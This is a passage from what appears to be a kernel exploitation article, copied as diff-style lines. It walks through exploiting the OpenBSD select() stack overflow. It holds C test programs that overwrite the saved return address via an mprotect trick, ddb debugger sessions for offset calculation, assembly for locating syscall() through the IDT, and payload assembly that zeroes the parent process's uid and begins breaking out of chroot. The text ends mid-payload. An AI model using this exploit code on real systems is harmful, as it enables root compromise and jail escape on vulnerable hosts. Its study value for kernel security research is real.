+        addl    %eax,%edx
+
+This addition operation is to verify if the user land address plus the size
+(%eax) is in legal user land address space. The user land address is moved
+to %edx and then added to the size (ubuf + size), which will point to the
+supposed end of the user land buffer.
+
+        jc      _C_LABEL(copy_fault)
+
+This is a smart check to see if previous addition operation has an integer
+over-wrap issue. e.g: the user land address being 0x0ded and size being
+0xffffffff -- this unsigned arithmetic operation will overlap and the
+result is going to be 0x0dec. By design, the CPU will set the carry flag on
+such condition and 'jc' jump short on carry flag set instruction will take
+us to _copy_fault function which do some clean up and return EFAULT .
+
+        cmpl    $VM_MAXUSER_ADDRESS,%edx
+        ja      _C_LABEL(copy_fault)
+
+Followed by the range check: whether or not the user land address plus size
+is in valid user land address space range. A comparison is done against the
+VM_MAXUSER_ADDRESS constant, which is the end of the user land stack
+(0xdfbfe000 through obsd 2.6-3.1). If the sum (%edx) is above
+VM_MAXUSER_ADDRESS 'ja' (jump above) instruction will make a short jump to
+_copy_fault , eventually leading to the termination of the copy operation.
+
+3:      /* bcopy(%esi, %edi, %eax); */
+        cld
+
+Clear the direction flag, DF = 0, means that the copy operation is going to
+increment the index registers '%esi and %edi' .
+
+        movl    %eax,%ecx
+        shrl    $2,%ecx
+        rep
+        movsl
+
+Do the copy operation long at a time, from %esi to %edi .
+
+        movb    %al,%cl
+        andb    $3,%cl
+        rep
+        movsb
+
+Copy the remaining (size % 4) data, byte at a time.
+
+        movl    _C_LABEL(curpcb),%edx
+        popl    PCB_ONFAULT(%edx)
+
+Move the current process control block address into %edx, and then pop the
+first value on the stack into the pcb_onfault member (ZERO [1] pushed
+earlier). This means, the special fault handler is cleared from the
+process.
+
+        popl    %edi
+        popl    %esi
+
+Restore the old values of %edi, %esi .
+
+        xorl    %eax,%eax
+        ret
+
+Do a return with a return value of zero: Success .
+
+ENTRY(copy_fault)
+
+In the case of faults and failures in checks at copyin() this is where we
+drop.
+
+        movl    _C_LABEL(curpcb),%edx
+        popl    PCB_ONFAULT(%edx)
+
+Move the current process control block address into %edx and then pop the
+first value on the stack into the pcb_onfault member (ZERO [1] pushed
+earlier). This clears the special fault handler from the process.
+
+        popl    %edi
+        popl    %esi
+
+Restore the old values of %edi, %esi .
+
+        movl    $EFAULT,%eax
+        ret
+
+Do a return with a return value of EFAULT (14): Failure .
+
+After this long exploration of the copyin() function we'll just take a
+brief look at trap() and check how pcb_onfault is implemented. trap() is
+the main interface to exception, fault and trap handling of the BSD kernel.
+
+trap.h:51:#define    T_PROTFLT        4      /* protection fault */
+trap.h:63:#define    T_SEGNPFLT      16      /* segment not present fault 
+*/
+trap.h:54:#define    T_ALIGNFLT       7      /* alignment fault */
+
+sys/arch/i386/i386/trap.c:174
+void
+trap(frame)
+        struct trapframe frame;
+{
+        register struct proc *p = curproc;
+        int type = frame.tf_trapno;
+...
+        switch (type) {
+
+...
+line: 269
+
+        case T_PROTFLT:
+        case T_SEGNPFLT:
+        case T_ALIGNFLT:
+                /* Check for copyin/copyout fault. */
+[1]             if (p && p->p_addr) {
+[2]                     pcb = &p->p_addr->u_pcb;
+[3]                     if (pcb->pcb_onfault != 0) {
+                        copyfault:
+[4]                             frame.tf_eip = (int)pcb->pcb_onfault;
+                                return;
+                        }
+                }
+
+...
+
+Faults such as 'protection', 'segment not present' and 'alignment' are
+handled all together, through a switch statement in trap() code. The
+appropriate case for the mentioned faults in trap() , initially checks for
+the existence of the process structure and the user structure [1] then
+loads the process control block from the user structure [2], check if the
+pcb_onfault is set [3] if its set, if so, the instruction pointer (%eip) of
+the control block is overwritten with the value of this special fault
+handler [4]. After the process is context switched and given the cpu, it
+will start running from the new handler code in kernel space. In the case
+of copyin() , execution will be redirected to _copy_fault . 
+
+Armoured with all this knowledge, we can now provide a solution for the
+'big size copyin()' problem.
+
+
+--[ 3.1.1 - mprotect() 4 life!
+
+
+x86 cpu memory operations such like trying to read from write only (-w-)
+page or trying to write to a read only (r--) or no access (---) page and
+some other combinations will throw out a protection fault which will be
+handled by trap() code as shown above. 
+
+This basic functionality will allow us to write as many bytes into kernel
+space as we wish, no matter how big the size value actually is. As seen
+above, the trap() code checks for pcb_onfault handler for protection faults
+and redirects execution to it. In order to stop copying from user land to
+kernel land, we will need to turn off the read protection bit of any
+certain page following the overflow vector and achieve our goal.
+
+-------------
+|    rwx    | --> Dynamically allocated PAGE_SIZEd 
+|           |     user land memory
+|           |
+|xxxxxxxxxxx| --> Overflow vector (fd_set array)
+-------------     (saved %ebp, %eip overwrite values)
+|    -w-    |
+|           |
+|           | --> Dynamically allocated PAGE_SIZEd 
+|           |     consecutive memory, PROT_WRITE
+-------------
+
+The way to control the overflow as described in the diagram is to allocate
+2 PAGE_SIZEd memory chunks and fill the end of the first page with overflow
+data (exploitation vector) and then turn off the read protection bit of the
+following page. 
+
+At this stage we also run into another problem (albeit rather simple to
+overcome). PAGE_SIZE is 4096 in x86 and 4096 bytes of overflowed stack will
+crash the kernel at an earlier stage (before we take control). 
+
+Actually for this specific overflow saved %ebp and saved %eip is 192 and
+196 bytes away from the overflowed buffer, respectively. So, what we'll do
+is allocate 2 pages and pass the fd_set pointer as 'second_page - 200'.
+Then copyin() will start copying just 200 bytes before the end of the
+readable page and will hit the non readable page right after. An expection
+will be thrown and trap() will handle the fault as explained, 'protection
+fault' handler will check pcb_onfault and set the instruction pointer of
+the current PCB to the address of the handler, in this case _copy_fault.
+_copy_fault will return EFAULT. 
+
+If we go back to the sys_select() code getbits() macro [4] will check for
+the return value and will go to 'done' label on any value other than
+success (0). At this point sys_select() set the error code (errno) and
+return to syscall() (syscall dispatcher).
+
+
+Here is the test code to verify the mprotect technique:
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/mman.h>
+#include <unistd.h>
+
+int
+main(void)
+{
+        char *buf;
+	u_long pgsz = sysconf(_SC_PAGESIZE);
+
+        buf = (char *) malloc(pgsz * 3);
+	/* asking for 3 pages, just to be safe */
+	if(!buf) { perror("malloc"); exit(-1); }
+        memset(buf, 0x41, pgsz*3); /* 0x41414141 ;) */
+
+	buf = (char *) (((u_long) buf & ~pgsz) + pgsz);
+	/* actually, we'r using the 2. and 3. pages*/
+
+	if(mprotect((char *) ((u_long) buf + pgsz), (size_t) pgsz,
+		PROT_WRITE) < 0)
+	{
+		perror("mprotect"); exit(-1);
+	}
+	/* we set the 3rd page as WRITE only, 
+	 * anything other than READ is fine 
+	 */
+	
+	select(0x80000000, (fd_set *) ((u_long) buf + pgsz - 200), NULL,
+		NULL, NULL);
+}
+
+- The ddb> kernel debugger
+
+To be able to debug the kernel we will need to set up the ddb kernel
+debugger. Type the following commands to make sure ddb is set and don't
+forget that, you should have some sort of console access to be able to
+debug the kernel. (Physical access, console cable or those funky network
+console devices...)
+
+bash-2.05a# sysctl -w ddb.panic=1
+ddb.panic: 1 -> 1
+bash-2.05a# sysctl -w ddb.console=1
+ddb.console: 1 -> 1
+
+The first sysctl command configures ddb to kick in on kernel panics. The
+latter will set up ddb accessible from console at any given time, with the
+ESC+CTRL+ALT key combination.
+
+There is no way to explore kernel vulnerabilities without many panic()s
+getting in the way, so lets get dirty.
+
+bash-2.05a# gcc -o test2 test2.c 
+bash-2.05a# sync
+bash-2.05a# sync
+bash-2.05a# uname -a
+OpenBSD kernfu 3.1 GENERIC#59 i386
+bash-2.05a# ./test2
+uvm_fault(0xe4536c6c, 0x41414000, 0, 1) -> e
+kernel: page fault trap, code=0
+Stopped at	0x41414141:uvm_fault(0xe4536c6c, 0x41414000, 0, 1) -> e
+...
+
+ddb> trace
+...
+_kdb_trap(6,0,e462af08,1) at _kdb_trap+0xc1
+_trap() at _trap+0x1b0
+--- trap (number 6) ---
+0x41414141:
+ddb>
+
+What all this means is that a page fault trap was taken from for address
+0x41414141 and since this is an invalid address for kernel land, it was not
+able to be paged in (such like every illegal address reference) which lead
+to a panic(). This means we are on the right track and indeed overwrite the
+%eip since the page 0x41414000 was attempted to loaded into memory.
+
+Type following for a clean reboot.
+ddb> boot sync
+....
+
+Lets verify that we gain the control by overwriting the %eip - here is how
+to set the appropriate breakpoints: 
+
+Hit CTRL+ALT+ESC: 
+
+ddb> x/i _sys_select,130
+_sys_select:	pushl	%ebp
+_sys_select+0x1:	movl	%esp,%ebp
+...
+...
+_sys_select+0x424:	leave
+_sys_select+0x425:	ret
+_sys_select+0x426:	nop
+...
+ddb> break _sys_select+0x425
+ddb> cont
+^M	--> hit enter!
+bash-2.05a# 
+
+At this stage some other process might kick ddb> in because of its use of
+the select syscall, just type 'cont' on the ddb> prompt and hit CR.
+
+bash-2.05a# ./test2 
+...
+ddb> print $ebp
+41414141
+ddb> x/i $eip
+_sys_select+0x425:	ret
+ddb> x/x $esp
+0xe461df3c:	41414141 --> saved instruction pointer!
+ddb> boot sync
+...
+
+
+--[ 3.2 - Payload storage problem
+
+
+The payload storage area for user land vulnerabilities is usually the
+overflowed buffer itself (if it's big enough) or some known user controlled
+other location such like environment variables, pre-overflow command
+leftovers, etc, etc, in short, any user controlled memory that will stay
+resident long enough to reference at a later time. Since the overflowed
+buffer may be small in size, it is not always feasible to store the payload
+there. Actually, for this specific buffer overflow, the contents of the
+overflowed buffer get corrupted leaving us no chance to return to it. Also,
+we will need enough room to execute code in kernel space to be able to do
+complex tasks, such as resetting the chroot pointers, altering pcred, ucred
+and securelevel and resolving where to return to ... for all these reasons
+we are going to execute payload in the source buffer as opposed to the
+destination (overflowed) buffer. This means we're going to jump to the user
+land page, execute our payload and return back to our caller transparently.
+This is all legitimate execution and we will have almost unlimited space to
+execute our payload. In regards to the select() overflow: copyin(ubuf,
+kbuf, big_num), we'll execute code inside 'ubuf'.
+ 
+
+--[ 3.3 - Return to user land problem
+
+
+After we gain control and execute our payload, we need to clean things up
+and start our journey to user land but this isn't as easy as it may sound.
+My first approach was to do an 'iret' (return from interrupt) in the
+payload after altering all necessary kernel structures but this approach
+turn out to be real painful. First of all, it's not an easy task to do all
+the post-syscall handling done by syscall() function. Also, the trap() code
+for kernel to user land transition can not be easily turn into payload
+assembly code. However the most obvious reason, not to choose the 'iret'
+technique is that messing with important kernel primitives such as locks,
+pending signals and/or mask-able interrupts is a really risky job thus
+drastically reducing the reliability of exploits and increasing the
+potential for post exploitation kernel panics. So I choose to stay out of
+it! ;)
+
+The solution was obvious, after payload execution we should return to the
+point in syscall() handler where _sys_select() was supposed to return.
+After that point, we don't need to care about any of the aforementioned
+kernel primitives. This solution leads to the question of how to find out
+where to return into since we have overwritten the return address to gain
+control thus losing our caller's location. We will explorer many of the
+possible solutions in section 5 and usage of the idtr register for kernel
+land address gathering will be introduced on section 5.2 for some serious
+fun!! Let's get going ...
+
+
+--[ 4 - Crafting the exploit
+
+
+In this section, setting up of proper breakpoints and how to calculate the
+distance to the saved instruction pointer will be discussed. Also, a new
+version of test code will be presented in order to demostrate that
+execution can be successfully directed to the user land buffer.
+
+
+--[ 4.1 - Breakpoints & Distance Calculation
+
+
+bash-2.05a# nm /bsd | grep _sys_select
+e045f58c T _linux_sys_select
+e01c5a3c T _sys_select
+bash-2.05a# objdump -d --start-address=0xe01c5a3c --stop-
+address=0xe01c5e63\
+>  /bsd | grep _copyin
+e01c5b72:       e8 f9 a9 f3 ff          call   e0100570 <_copyin>
+e01c5b9f:       e8 cc a9 f3 ff          call   e0100570 <_copyin>
+e01c5bcc:       e8 9f a9 f3 ff          call   e0100570 <_copyin>
+e01c5bf9:       e8 72 a9 f3 ff          call   e0100570 <_copyin>
+
+The first copyin() is the one that copies the readfds and overflows the
+kernel stack. That's the one we are after.
+
+CTRL+ALT+ESC
+bash-2.05a# Stopped at _Debugger+0x4: leave
+ddb> x/i 0xe01c5b72
+_sys_select+0x136:	call	_copyin
+ddb> break _sys_select+0x136
+ddb> cont
+^M
+bash-2.05a# ./test2
+Breakpoint at	_sys_select+0x136:	call	_copyin
+ddb> x/x $esp,3
+0xe461de20:	5f38	e461de78	10000000
+
+These are the 3 arguments pushed on the stack for copyin() ubuf: 0x5f38
+kbuf: 0xe461de78 len:10000000
+
+ddb> x/x 0x5f38
+0x5f38:	41414141
+...
+ddb> x/x $ebp
+0xe461df38:	e461dfa8	--> saved %ebp
+ddb> ^M
+0xe461df3c:	e02f34ce	--> saved %eip 
+ddb>
+
+In the x86 calling convention, 2 longs just before the base pointer are the
+saved eip (return address) and the saved ebp, respectively. To calculate
+the distance between the stack buffer and the saved eip in ddb is done as
+follows:
+
+ddb> print 0xe461df3c - 0xe461de78
+      c4 
+ddb> boot sync
+...
+
+The distance between the address of saved "return address" and the kernel
+buffer is 196 (0xc4) bytes. Limiting our copyin() operation to 200 bytes
+with the mprotect() technique will ensure a clean overflow.
+
+
+4.2 - Return address overwrite & execution redirection
+
+
+At this stage I'll introduce another test code to "verify" execution
+redirection and usability of the user land buffer for payload execution.
+
+test3.c:
+
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/mman.h>
+#include <unistd.h>
+
+int
+main(void)
+{
+        char *buf;
+        long *lptr;
+        u_long pgsz = sysconf(_SC_PAGESIZE);
+
+        buf = (char *) malloc(pgsz * 3);
+        if(!buf) { perror("malloc"); exit(-1); }
+        memset(buf, 0xcc, pgsz*3); /* int3 */
+
+        buf = (char *) (((u_long) buf & ~pgsz) + pgsz);
+
+	if(mprotect((char *) ((u_long) buf + pgsz), (size_t) pgsz,
+		PROT_WRITE) < 0)
+        {
+		perror("mprotect"); exit(-1);
+	}
+
+
+        lptr = (long *) ((u_long)buf + pgsz - 8);
+        *lptr++ = 0xbaddcafe; /* saved %ebp, does not 
+			       * matter at this stage
+			       */
+        *lptr++ = (long) buf; /* overwrite the return addr 
+			       * with buf's addr
+			       */
+	select(0x80000000, (fd_set *) ((u_long) buf + pgsz - 200), NULL,
+		NULL, NULL);
+}
+ 
+
+test3.c code will overwrite the saved ebp with 0xbaddcafe and the saved
+instruction pointer with the address of the user land buffer, which is
+filled with 'int 3''s (debug interrupts). This code should kick in the
+kernel debugger.
+
+bash-2.05a# gcc -o test3 test3.c
+bash-2.05a# ./test3
+Stopped at	0x5001:	int	$3
+ddb> x/i $eip,2
+0x5001:	int	$3
+0x5002: int	$3
+ddb> print $ebp
+baddcafe
+ddb> boot sync
+...
+
+Everything goes as planned, we successfully jump to user land and execute
+code. Now we shall concentrate on other issues such as payload/shellcode
+creation, symbol address gathering on run time, etc...
+
+
+--[ 5 - How to gather offsets & symbol addresses
+
+
+Before considering what to achieve with kernel payload, I should remind you
+about the previous questions that we raised which was how to return back to
+user land, the proposed solution was basically to fix up %ebp, find out
+where syscall() handler is in memory, plus where in syscall() we should be
+returning. Payload is the obvious place to do the mentioned fix- ups but
+this brings the complication of how to gather kernel addresses. After
+dealing with some insufficient pre-exploitation techniques such like 'nm
+/bsd', kvm_open() and nlist() system interfaces which are all lacking the
+solution for non-reable (in terms of fs permissions) kernel image (/bsd).
+I come to the conclusion that all address gathering should be done on run
+time (in the execution state of the payload). Many win32 folks have been
+doing this type of automation in shellcodes by walking through the thread
+environment block (TEB) for some time. Also kernel structures such like the
+process structure has to be supplied to the payload in order to achieve our
+goals. Following sections would introduce the proposed solutions for kernel
+space address gathering.
+
+
+--[ 5.1 - sysctl() syscall
+
+
+sysctl() system call will enable us to gather process structure information
+which is needed for the credential and chroot manipulation payloads. In
+this section we will take a brief look into the internals of the sysctl()
+syscall.
+
+sysctl is a system call to get and set kernel level information from user
+land. It has a good interface to pass data from kernel to user land and
+back. sysctl interface is structured into several sub components such as
+the kernel, hardware, virtual memory, net, filesystem and architecure
+system control interfaces. We'll concentrate on the kernel sysctl's which
+is handled by the kern_sysctl()function. See: sys/kern/kern_sysctl.c:234
+kern_sysctl() function also assigns different handlers to certain queries
+such as proc structure, clockrate, vnode and file information. The process
+structure is handled by the sysctl_doproc() function and this is the
+interface to kernel land information that we are after!
+
+int
+sysctl_doproc(name, namelen, where, sizep)
+        int *name;
+        u_int namelen;
+        char *where;
+        size_t *sizep;
+{
+
+...
+
+[1] for (; p != 0; p = LIST_NEXT(p, p_list)) {
+
+...
+[2]        switch (name[0]) {
+
+                case KERN_PROC_PID:
+                        /* could do this with just a lookup */
+[3]                     if (p->p_pid != (pid_t)name[1])
+                                continue;
+                        break;
+
+		...
+
+	  }
+		....
+
+                if (buflen >= sizeof(struct kinfo_proc)) {
+[4]                     fill_eproc(p, &eproc);
+[5]                     error = copyout((caddr_t)p, &dp->kp_proc,
+                                        sizeof(struct proc));
+....
+
+
+void
+fill_eproc(p, ep)
+        register struct proc *p;
+        register struct eproc *ep;
+{
+        register struct tty *tp;
+
+[6]        ep->e_paddr = p;
+
+
+Also for sysctl_doproc() there can be different types of queries which are
+handled by the switch [2] statement. KERN_PROC_PID is the query that is
+sufficient enough to gather the needed address about any process's proc
+structure. For the select() overflow it was sufficient enough just to
+gather the parent process's proc address but the setitimer() vulnerability
+make use of the sysctl() interface in many different ways (more on this
+later).
+
+sysctl_doproc() code iterates through [1] the linked list of proc
+structures in order to find the queried pid [3], and, if found, certain
+structures (eproc & kp_proc) get filled-in [4], [5] and copyout to user
+land. fill_eproc() (called  from [4]) does the trick [6] and copies the
+proc address of the queried pid into the e_paddr member of the eproc
+structure, which, in turn, was eventually copied out to user land in the
+kinfo_proc structure (which is the main data structure for the
+sysctl_doproc() function). For further information on members of these
+structures see: sys/sys/sysctl.h.
+
+The following is the function we'll be using to retrieve the kinfo_proc
+structure:
+
+void
+get_proc(pid_t pid, struct kinfo_proc *kp)
+{
+   u_int arr[4], len;
+        
+        arr[0] = CTL_KERN;
+        arr[1] = KERN_PROC;
+        arr[2] = KERN_PROC_PID;
+        arr[3] = pid;
+        len = sizeof(struct kinfo_proc);
+        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
+                perror("sysctl");
+                exit(-1);
+        }
+         
+}
+
+
+It is a pretty straightforward interface, what happens is: CTL_KERN will be
+dispatched to kern_sysctl() by sys_sysctl() KERN_PROC will be dispatched to
+sysctl_doproc() by kern_sysctl() KERN_PROC_PID will be handled by the
+aforementioned switch statement, eventually returning the kinfo_proc
+structure.
+
+<rant>
+sysctl() system call might be there with all good intensions such as
+getting and setting kernel information in a dynamic fashion. However, from
+a security point of view, I believe sysctl() syscall should not be blindly
+giving proc information about any queried pid. Credential checks should be
+added in proper places, especially for the systcl_doproc() interface ...
+</rant>
+
+
+--[ 5.2 - sidt technique & _kernel_text search
+
+
+As mentioned before, we are after transparent payload execution so that
+_sys_select() will actually return to its caller _syscall() as expected.  I
+will explain how to gather the return path in this section. The solution
+depends on the idtr (interrupt descriptor table register) that contains a
+fixed location address, which is the start of the Interrupt Descriptor
+Table (IDT).
+
+Without going into too many details, IDT is the table that holds the
+interrupt handlers for various interrupt vectors. Each interrupt in x86 is
+represented by a number in the range 0 - 255 and these numbers are called
+the interrupt vectors. These vectors are used to locate the initial handler
+for any given interrupt inside the IDT. IDT contains 256 entries, each
+being 8 bytes. IDT descriptor entries can be 3 different types but we will
+concentrate only on the gate descriptor:
+
+sys/arch/i386/include/segment.h:99
+
+struct gate_descriptor {
+        unsigned gd_looffset:16;        /* gate offset (lsb) */
+        unsigned gd_selector:16;        /* gate segment selector */
+        unsigned gd_stkcpy:5;           /* number of stack wds to cpy */
+        unsigned gd_xx:3;               /* unused */
+        unsigned gd_type:5;             /* segment type */
+        unsigned gd_dpl:2;              /* segment descriptor priority 
+level */
+        unsigned gd_p:1;                /* segment descriptor present */
+        unsigned gd_hioffset:16;        /* gate offset (msb) */
+}
+
+gate_descriptor's members gd_looffset and gd_hioffset will form the low
+level interrupt handler's address. For more information on the various
+fields, reader should consult to the architecture manuals [Intel]. 
+
+System call interface to request kernel services is implemented through the
+software initiated interrupt: 0x80. Armored with this knowledge, starting
+from the address of the low level syscall interrupt handler and walking
+through the kernel text, we can find our way to the high level syscall
+handler and finally return to it. 
+
+Interrupt descriptor table under OpenBSD is named _idt_region and slot
+number: 0x80 is the gate descriptor for the system call interrupt 'int
+0x80'. Since every member is 8 bytes, system call gate_descriptor is at
+address '_idt_region + 0x80 * 0x8' which is '_idt_region + 0x400'. 
+
+bash-2.05a# Stopped at		_Debugger+0x4: leave
+ddb> x/x _idt_region+0x400
+_idt_region+0x400:	80e4c
+ddb> ^M
+_idt_region+0x404:	e010ef00
+
+To figure out the initial syscall handler we need to do the proper 'shift'
+and 'or' operations on the gate descriptor bit fields, which leads to the
+0xe0100e4c kernel address.
+
+bash-2.05a# Stopped at          _Debugger+0x4: leave
+ddb> x/x 0xe0100e4c
+_Xosyscall_end:	pushl	$0x2
+ddb> ^M
+_Xosyscall_end+0x2:	pushl	$0x3
+...
+...
+_Xosyscall_end+0x20:	call	_syscall
+...
+
+As per exception or software initiated interrupt, the corresponding vector
+is found in the IDT and the execution is redirected to the handler gathered
+from the gate descriptor. This is an intermediate handler and will
+eventually take us to real handler. As seen at the kernel debugger output,
+the initial handler _Xosyscall_end saves all registers (also some other low
+level stuff) and immediately calls the real handler which is _syscall().
+
+We have mentioned that the idtr register always contains the address of the
+_idt_region, here is the way to access its content:
+
+sidt 0x4(%edi)
+mov  0x6(%edi),%ebx  
+
+Address of the _idt_region is moved to ebx and IDT can now be referenced
+via ebx. Assembly code to gather the syscall handler starting from the
+initial handler is as follows;
+
+sidt 0x4(%edi)
+mov  0x6(%edi),%ebx     # mov _idt_region is in ebx
+mov  0x400(%ebx),%edx   # _idt_region[0x80 * (2*sizeof long) = 0x400]
+mov  0x404(%ebx),%ecx   # _idt_region[0x404]
+shr  $0x10,%ecx	        #
+sal  $0x10,%ecx	        # ecx = gd_hioffset
+sal  $0x10,%edx	        #
+shr  $0x10,%edx         # edx = gd_looffset
+or   %ecx,%edx          # edx = ecx | edx  =  _Xosyscall_end
+
+At this stage we have successfully found the initial/intermediate handler's
+location, so the next step is to search through the kernel text, find 'call
+_syscall', gather the displacement of the call instruction and add it to
+the address of the instruction's location. Also plus 5 should be added to
+the displacement for the size of the call instruction.
+
+xor  %ecx,%ecx          # zero out the counter
+up:
+inc  %ecx
+movb (%edx,%ecx),%bl    # bl =  _Xosyscall_end++
+cmpb $0xe8,%bl          # if bl == 0xe8 : 'call'
+jne  up
+
+lea  (%edx,%ecx),%ebx   # _Xosyscall_end+%ecx: call _syscall
+inc  %ecx
+mov  (%edx,%ecx),%ecx   # take the displacement of the call ins.
+add  $0x5,%ecx          # add 5 to displacement
+add  %ebx,%ecx          # ecx = _Xosyscall_end+0x20 + disp = _syscall()
+
+At this stage %ecx holds the address of the real handler _syscall(). The
+next step is to find out where to return inside the syscall() function
+which eventually leads to a broader research on various versions of OpenBSD
+with various kernel compilation options. Luckily, it turns out to be safe
+to search for the 'call *%eax' instruction inside the _syscall(), because
+this turns out to be the instruction that dispatches every system call to
+its final handler in every OpenBSD version I have tested.
+
+For OpenBSD 2.6 through 3.1 kernel code always dispatched the system calls
+with the 'call *%eax' instruction, which is unique in the scope of
+_syscall() function.
+
+bash-2.05a# Stopped at          _Debugger+0x4: leave
+ddb> x/i _syscall+0x240
+_syscall+0x240:	call	*%eax
+ddb>cont
+
+Our goal is now to figure out the offset (0x240 in the above disasm) for
+any kernel version so that we can return to the instruction just after it
+from our payload and achieve our goal. The code to search for 'call *%eax'
+is as follows:
+
+# _syscall+0x240: ff
+# _syscall+0x241: d0    0x240->0x241 OBSD3.1
+
+mov  %ecx,%edi         # ecx is the addr of _syscall 
+movw $0xd0ff,%ax       # search for ffd0 'call *%eax'
+cld
+mov  $0xffffffff,%ecx
+repnz
+scasw                  # scan (%edi++) for %ax
+
+# %edi gets incremented one last time before breaking the loop
+# %edi contains the instruction address just after 'call *%eax' 
+# so return to it!!!
+
+xor  %eax,%eax         #set up the return value = Success ;)
+
+push %edi              # push %edi on the stack and return to it
+ret
+
+
+Finally, this is all we needed for a clean return. This payload can be used
+for any syscall overflow without requiring any further modification.
+ 
+
+--[ 5.3 - _db_lookup() technique 
+
+
+This technique introduces no new concepts; it is just another kernel text
+search to find out the address of _db_lookup() -- the kernel land
+equivalent of dlsym(). The search is based on the function fingerprint,
+which is fairly safe on the recent versions on which the code has been
+developed, but it might not work on the older versions. I choose to keep it
+out of the text for brevity's sake but it's exact the same 'repnz scas'
+concept just used in the idtr technique. (for sample code, contact me.)
+
+ 
+--[ 5.4 - /usr/bin/nm, kvm_open(), nlist()
+
+
+/usr/bin/nm, kvm library and nlist() library interface can all be used to
+gather kernel land symbols and offsets but, as we already mentioned, they
+all require a readable kernel image and/or additional privileges which in
+most secured systems are not usually avaliable.
+
+Furthermore, the most obvious problem with these interfaces are that they
+won't work at all in chroot()ed environments with no privileges (nobody).
+These are the main reasons I have not used these techniques within the
+exploitation phase of privilege escalation and chroot breaking, but after
+establishing full control over the system (uid = 0 and out of jail), I have
+made use of offline binary symbol gathering in order to reset the
+securelevel, more about this later.
+
+
+--[ 5.5 - %ebp fixup
+
+
+After taking care of the saved return address, we need to fix %ebp to
+prevent crashes in later stages (especially in _syscall() code). The proper
+way to calculate %ebp is to find out the difference between the stack
+pointer and the saved base pointer at the procedure exit and used this
+static number to restore %ebp. For all the versions of OpenBSD 2.6 through
+3.1 this difference was 0x68 bytes. You can simply set a breakpoint on
+_sys_select prolog and another one just before the 'leave' instruction at
+the epilog and calculate the difference between the %ebp recorded at the
+prolog and the %esp recorded just before the epilog.
+
+lea  0x68(%esp),%ebp # fixup ebp
+
+Above instruction would be enough to set the %ebp back to its old value.
+
+
+--[ 6 - Payload/Shellcode Creation
+
+
+In the following sections we'll develop small payloads that modify certain
+fields of its parent process' proc structure to achieve elevated privileges
+and break out of chroot/jail environments. Then, we'll chain the developed
+assembly code with the sidt code to work our way back to user land and
+enjoy our new privileges.
+
+
+--[ 6.1 - What to achieve
+
+
+Setting up a jail with nobody privileges and trying to break out of it
+seems like a fairly good goal to achieve. Since all these privilege
+separation terms are brought into OpenBSD with the latest OpenSSH, it would
+be nice to actually demonstrate how trivial it would be to bypass this kind
+of 'protection' by way of such kernel level vulnerabilities.
+
+Certain inetd.conf services and OpenSSH are run as nobody/user in a
+chrooted/jailed environment -- intended to be an additional assurance of
+security. This is a totally false sense of security; jailme.c code follows:
+
+jailme.c:
+
+#include <stdio.h>
+
+int
+main()
+{
+        chdir("/var/tmp/jail");
+        chroot("/var/tmp/jail");
+        setgroups(NULL, NULL);
+        setgid(32767);
+        setegid(32767);
+        setuid(32767);
+        seteuid(32767);
+        execl("/bin/sh", "jailed", NULL);
+}
+
+bash-2.05a# gcc -o jailme jailme.c
+bash-2.05a# cp jailme /tmp/jailme
+bash-2.05a# mkdir /var/tmp/jail
+bash-2.05a# mkdir /var/tmp/jail/usr
+bash-2.05a# mkdir /var/tmp/jail/bin /var/tmp/jail/usr/lib
+bash-2.05a# mkdir /var/tmp/jail/usr/libexec
+bash-2.05a# cp /bin/sh /var/tmp/jail/bin/
+bash-2.05a# cp /usr/bin/id /var/tmp/jail/bin/
+bash-2.05a# cp /bin/ls /var/tmp/jail/bin/
+bash-2.05a# cp /usr/lib/libc.so.28.3 /var/tmp/jail/usr/lib/
+bash-2.05a# cp /usr/libexec/ld.so /var/tmp/jail/usr/libexec/
+bash-2.05a# cat >> /etc/inetd.conf 
+1024            stream  tcp     nowait  root    /tmp/jailme
+^C
+bash-2.05a# ps aux | grep inetd
+root     19121  0.0  1.1   148   352 p0  S+     8:19AM    0:00.05 grep 
+inetd 
+root     27152  0.0  1.1    64   348 ??  Is     6:00PM    0:00.08 inetd 
+bash-2.05a# kill -HUP 27152
+bash-2.05a# nc -v localhost 1024
+Connection to localhost 1024 port [tcp/*] succeeded!
+ls -l /
+total 4
+drwxr-xr-x  2 0  0  512 Dec  9 16:23 bin
+drwxr-xr-x  4 0  0  512 Dec  9 16:21 usr
+id
+uid=32767 gid=32767
+ps
+jailed: <stdin>[4]: ps: not found
+....
+
+
+--[ 6.2 - The payload
+
+
+Throughout this section we will introduce all the tiny bits of the complete
+payload. So all these section chained together will form the eventual
+payload, which will be available at the code section (10) of this paper.
+
+
+--[ 6.2.1 - p_cred & u_cred
+
+
+We'll start with the privilege elevation section of the payload. Following
+is the payload to update ucred (credentials of user) and pcred (credentials
+of the process) of any given proc structure. Exploit code fills in the proc
+address of its parent process by using the sysctl() system call (discussed
+on 5.1) replacing .long 0x12345678. The following 'call' and 'pop'
+instructions will load the address of the given proc structure address into
+%edi. The typical address gathering technique used in almost every PIC
+%shellcode [ALEPH1].
+
+call moo
+.long 0x12345678   <-- pproc addr
+.long 0xdeadcafe
+.long 0xbeefdead
+nop
+nop
+nop
+moo:
+pop  %edi
+mov  (%edi),%ecx      # parent's proc addr in ecx
+
+		      # update p_ruid
+mov  0x10(%ecx),%ebx  # ebx = p->p_cred
+xor  %eax,%eax        # eax = 0
+mov  %eax,0x4(%ebx)   # p->p_cred->p_ruid = 0
+
+	              # update cr_uid
+mov  (%ebx),%edx      # edx = p->p_cred->pc_ucred
+mov  %eax,0x4(%edx)   # p->p_cred->pc_ucred->cr_uid = 0
+
+
+--[ 6.2.2 - chroot breaking
+
+
+Next tiny assembly fragment will be the chroot breaker of our complete
+payload.
+
+Without going into extra detail (time is running out, deadline is within 3
+days ;)), lets take a brief look of how chroot is checked on a per-process
+basis. chroot jails are implemented by filling in the fd_rdir member of the
+filedesc (open files structure) with the desired jail directories vnode
+pointer. When kernel is giving certain services to any process, it checks
+for the existence of this pointer and if it's filled with a vnode that
+process is handled slightly different and kernel will create the notion of
+a new root directory for this process thus jailing it into a predefined
+directory. For a regular process this pointer is zero / unset.  So without
+any further need to go into implementation level details, just setting this
+pointer to NULL means FREEDOM! fd_rdir is referenced through the proc
+structure as follows:
+
+p->p_fd->fd_rdir 
+
+As with the credentials structure, filedesc is also trivial to access and
+alter, with only 2 instruction additions to our payload.
+
+# update p->p_fd->fd_rdir to break chroot()
+
